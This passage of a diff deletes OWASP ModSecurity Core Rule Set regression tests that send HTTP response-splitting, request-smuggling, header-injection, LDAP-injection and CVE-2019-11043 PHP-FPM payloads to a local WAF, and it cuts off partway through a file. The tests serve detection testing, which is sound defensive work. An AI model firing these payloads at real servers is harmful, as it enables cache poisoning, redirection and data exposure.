encoded_request: "R0VUIC9nZXQgSFRUUC8xLjENCkhvc3Q6IGxvY2FsaG9zdA0KVXNlci1BZ2VudDogT1dBU1AgQ1JTIHRlc3QgYWdlbnQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24NCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veG1sDQoNCg=="
output:
log_contains: "id \"920620\""

130
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml vendored
View file

@ -1,130 +0,0 @@
---
meta:
author: "Christian S.J. Peron, Franziska Bühler"
description: None
enabled: true
name: 921110.yaml
tests:
- test_title: 921110-1
desc: "HTTP Response Splitting"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=%0aPOST / HTTP/1.0"
version: HTTP/1.0
output:
log_contains: id "921110"
- test_title: 921110-2
desc: "HTTP Response Splitting"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0aGET+/+HTTP/1.1"
version: HTTP/1.0
output:
log_contains: id "921110"
- test_title: 921110-3
desc: "HTTP Response Splitting"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0dHEAD+http://example.com/+HTTP/1.1"
version: HTTP/1.0
output:
log_contains: id "921110"
- test_title: 921110-4
desc: "HTTP Response Splitting"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0d%0aGet+/foo%0d"
version: HTTP/1.0
output:
log_contains: id "921110"
- test_title: 921110-5
desc: "HTTP Response Splitting"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cache-Control: "no-cache, no-store, must-revalidate"
method: POST
port: 80
data: "var=aaa%0d%0aGet+foo+bar"
version: HTTP/1.0
output:
no_log_contains: id "921110"
- test_title: 921110-6
desc: HTTP Request Smuggling bypass with Content-Type text/plain
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Type: text/plain
Content-Length: 36
method: POST
port: 80
uri: /
data: "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n"
output:
log_contains: id "921110"
- test_title: 921110-7
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2
output:
log_contains: id "921110"
- test_title: 921110-8
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2
output:
log_contains: id "921110"

62
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml vendored
View file

@ -1,62 +0,0 @@
---
meta:
author: csanders-git, Franziska Bühler
description: None
enabled: true
name: 921120.yaml
tests:
- test_title: 921120-1
desc: HTTP response splitting (921120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
version: HTTP/1.1
output:
log_contains: id "921120"
- test_title: 921120-2
desc: "HTTP Response splitting attack"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423<html>ftw</html>"
version: HTTP/1.1
output:
log_contains: id "921120"
- test_title: 921120-3
desc: "Fix FP issue 1615. Header followed by word chars."
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D"
version: HTTP/1.1
output:
no_log_contains: id "921120"

73
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml vendored
View file

@ -1,73 +0,0 @@
---
meta:
author: "csanders-git, Franziska Bühler"
description: None
enabled: true
name: 921130.yaml
tests:
- test_title: 921130-1
desc: HTTP response splitting (921130) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-sg
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E
version: HTTP/1.1
output:
log_contains: id "921130"
- test_title: 921130-2
desc: "HTTP Response splitting attack: cookie data"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
Cookie: "oreo=munchmuch%0d%0a%0d%0a<HTML><title></title></HTML>"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: "/"
output:
log_contains: id "921130"
- test_title: 921130-3
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2
output:
log_contains: id "921130"
- test_title: 921130-4
desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Accept: "*/*"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
method: GET
port: 80
uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2
output:
log_contains: id "921130"

36
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml vendored
View file

@ -1,36 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921140.yaml"
description: "Tests for protocol based attacks"
tests:
- test_title: 921140-1
desc: "HTTP Header Injection Attack via headers"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code"
uri: "/"
output:
status: [400]
no_log_contains: "id:921140"
- test_title: 921140-2
desc: "HTTP Header Injection Attack via headers"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code"
uri: "/"
output:
no_log_contains: "id:921140"

21
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml vendored
View file

@ -1,21 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921150.yaml"
description: "Tests for protocol based attacks"
tests:
- test_title: 921150-1
desc: "HTTP Header Injection Attack via payload"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata"
output:
log_contains: "id \"921150\""

77
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml vendored
View file

@ -1,77 +0,0 @@
---
meta:
author: "Christian S.J. Peron"
enabled: true
name: "921160.yaml"
description: "Tests for protocol based attacks"
tests:
- test_title: 921160-1
desc: "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com"
output:
log_contains: id "921160"
- test_title: 921160-2
desc: "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com"
output:
log_contains: id "921160"
- test_title: 921160-3
desc: "HTTP Header Injection Attack via payload: w/header"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com"
output:
log_contains: id "921160"
- test_title: 921160-4
desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com"
output:
log_contains: id "921160"
- test_title: 921160-5
desc: "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "user agent"
uri: "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y"
output:
log_contains: id "921160"

59
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921190.yaml vendored
View file

@ -1,59 +0,0 @@
---
meta:
author: "Andrea Menin (theMiddle)"
description: "HTTP Splitting"
enabled: true
name: 921190.yaml
tests:
- test_title: 921190-1
desc: "New line char in request filename (1)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/foo%0Abar"
output:
log_contains: id "921190"
- test_title: 921190-2
desc: "New line char in request filename (2)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/foo%0abar"
output:
log_contains: id "921190"
- test_title: 921190-3
desc: "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/index.php/PHP%0Ainfo.php?QQQ"
output:
log_contains: id "921190"
- test_title: 921190-4
desc: "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
uri: "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ"
output:
log_contains: id "921190"

157
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml vendored
View file

@ -1,157 +0,0 @@
---
meta:
author: "Christian Folini"
description: "LDAP injection"
enabled: true
name: 921200.yaml
tests:
- test_title: 921200-1
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))"
uri: "/"
output:
no_log_contains: id "921200"
- test_title: 921200-2
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)"
uri: "/"
output:
no_log_contains: id "921200"
- test_title: 921200-3
desc: "Testing for FP, this should not trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
port: 80
method: POST
data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))"
uri: "/"
output:
no_log_contains: id "921200"
- test_title: 921200-4
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=bar)(%26)"
uri: "/"
port: 80
output:
log_contains: id "921200"
- test_title: 921200-5
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=printer)(uid=*)"
uri: "/"
port: 80
output:
log_contains: id "921200"
- test_title: 921200-6
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=void)(objectClass=users))(%26(objectClass=void)"
uri: "/"
port: 80
output:
log_contains: id "921200"
- test_title: 921200-7
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=eb9adbd87d)!(sn=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
- test_title: 921200-8
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=*)!(sn=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
- test_title: 921200-9
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=*)(uid=*))(|(uid=*"
uri: "/"
port: 80
output:
log_contains: id "921200"
- test_title: 921200-10
desc: "Testing for rule, this should trigger"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "ModSecurity CRS 3 Tests"
method: POST
data: "foo=aaa*aaa)(cn>=bob)"
uri: "/"
port: 80
output:
log_contains: id "921200"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "Christian Folini (dune73)"
description: "HTTP Range Header"
enabled: true
name: 921230.yaml
tests:
- test_title: 921230-1
desc: "Submit HTTP Range Header, forbidden at PL3 by default"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
headers:
Host: "localhost"
User-Agent: "OWASP ModSecurity Core Rule Set"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Range: 1-2
port: 80
uri: "/"
output:
log_contains: id "921230"

199
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml vendored
View file

@ -1,199 +0,0 @@
---
meta:
author: studersi
description: Test whether the recommended rules can be fooled into using the wrong body processor which can result in bypasses
enabled: true
name: 921421.yaml
tests:
- test_title: 921421-1
desc: Bypass targeting recommended rules (rule 200000)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/json"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921421"
- test_title: 921421-2
desc: Bypass targeting recommended rules (rule 200006)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921421"
- test_title: 921421-3
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="text/xml"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921421"
- test_title: 921421-4
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/xml"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921421"
- test_title: 921421-5
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921421"
- test_title: 921421-6
desc: Negative test for 921421-1
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/json
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"
- test_title: 921421-7
desc: Negative test for 921421-2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/vnd.mycompany.myapp.customer-v2+json
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"
- test_title: 921421-8
desc: Negative test for 921421-3
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: text/xml
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"
- test_title: 921421-9
desc: Negative test for 921421-4
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/xml
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"
- test_title: 921421-10
desc: Negative test for 921421-5
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/soap+xml
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"
- test_title: 921421-11
desc: Negative test for rule 921421-6
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: text/html; charset=UTF-8
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"
- test_title: 921421-12
desc: Negative test for rule 921421-7
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=something
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921421"

279
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml vendored
View file

@ -1,279 +0,0 @@
---
meta:
author: studersi
description: Try to send mime types in different part of Content-Type header
enabled: true
name: 921422.yaml
tests:
- test_title: 921422-1
desc: Bypass targeting recommended rules (rule 200000)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/json"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-2
desc: Bypass targeting recommended rules (rule 200006)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-3
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="text/xml"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-4
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="application/xml"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-5
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="multipart/related"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-6
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="text/html"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-7
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-8
desc: Bypass targeting recommended rules (rule 200001)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar"
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
log_contains: id "921422"
- test_title: 921422-9
desc: Negative test for 921422-1
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/json
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-10
desc: Negative test for 921422-2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/vnd.mycompany.myapp.customer-v2+json
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-11
desc: Negative test for 921422-3
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: text/xml
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-12
desc: Negative test for 921422-4
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/xml
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-13
desc: Negative test for 921422-5
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/soap+xml
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-14
desc: Negative test for 921422-6
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: text/html
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-15
desc: Negative test for rule 921422-7
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: text/html; charset=UTF-8
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-16
desc: Negative test for rule 921422-8
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=something
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"
- test_title: 921422-17
desc: Negative test for rule 921422-9
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd
method: POST
port: 80
uri: /post
version: HTTP/1.1
output:
no_log_contains: id "921422"

63
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml vendored
View file

@ -1,63 +0,0 @@
---
meta:
author: "Felipe Zipitria"
description: Test Multipart/form-data
enabled: true
name: 922100.yaml
tests:
- test_title: 922100-1
desc: "Positive test: utf-7 is not in allowed charsets"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=boundary
Accept: "*/*"
method: POST
port: 80
uri: "/post"
version: "HTTP/1.1"
data: |
--boundary
Content-disposition: form-data; name="_charset_"
utf-7
--boundary
Content-disposition: form-data; name="positive"
Content-Type: text/plain
Let me see if I can use utf-7.
--boundary--
output:
log_contains: id "922100"
- test_title: 922100-2
desc: "Negative test: only allowed charsets when using _charset_"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=boundary
Accept: "*/*"
method: POST
port: 80
uri: "/post"
version: "HTTP/1.1"
data: |
--boundary
Content-disposition: form-data; name="_charset_"
utf-8
--boundary
Content-disposition: form-data; name="negative"
Content-Type: text/plain
This should be good as we use utf-8 that is allowed.
--boundary--
output:
no_log_contains: id "922100"

63
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml vendored
View file

@ -1,63 +0,0 @@
---
meta:
author: "Felipe Zipitria"
description: Test Multipart/form-data
enabled: true
name: 922110.yaml
tests:
- test_title: 922110-1
desc: "Positive test: utf-7 is not in allowed charsets"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=boundary
Accept: "*/*"
method: POST
port: 80
uri: "/post"
version: "HTTP/1.1"
data: |
--boundary
Content-disposition: form-data; name="_charset_"
utf-8
--boundary
Content-disposition: form-data; name="922110"
Content-Type: text/plain; charset=utf-7
Knock knock.
--boundary--
output:
log_contains: id "922110"
- test_title: 922110-2
desc: "Negative test: utf-8 is allowed"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=boundary
Accept: "*/*"
method: POST
port: 80
uri: "/post"
version: "HTTP/1.1"
data: |
--boundary
Content-disposition: form-data; name="_charset_"
utf-8
--boundary
Content-disposition: form-data; name="negative"
Content-Type: text/plain; charset=utf-8
I shold be allowed to get in.
--boundary--
output:
no_log_contains: id "922110"

56
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml vendored
View file

@ -1,56 +0,0 @@
---
meta:
author: "Felipe Zipitria"
description: Test Multipart/form-data
enabled: true
name: 922120.yaml
tests:
- test_title: 922120-1
desc: "Positive test: utf-7 is not in allowed charsets"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: "localhost"
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: multipart/form-data; boundary=boundary
Accept: "*/*"
method: POST
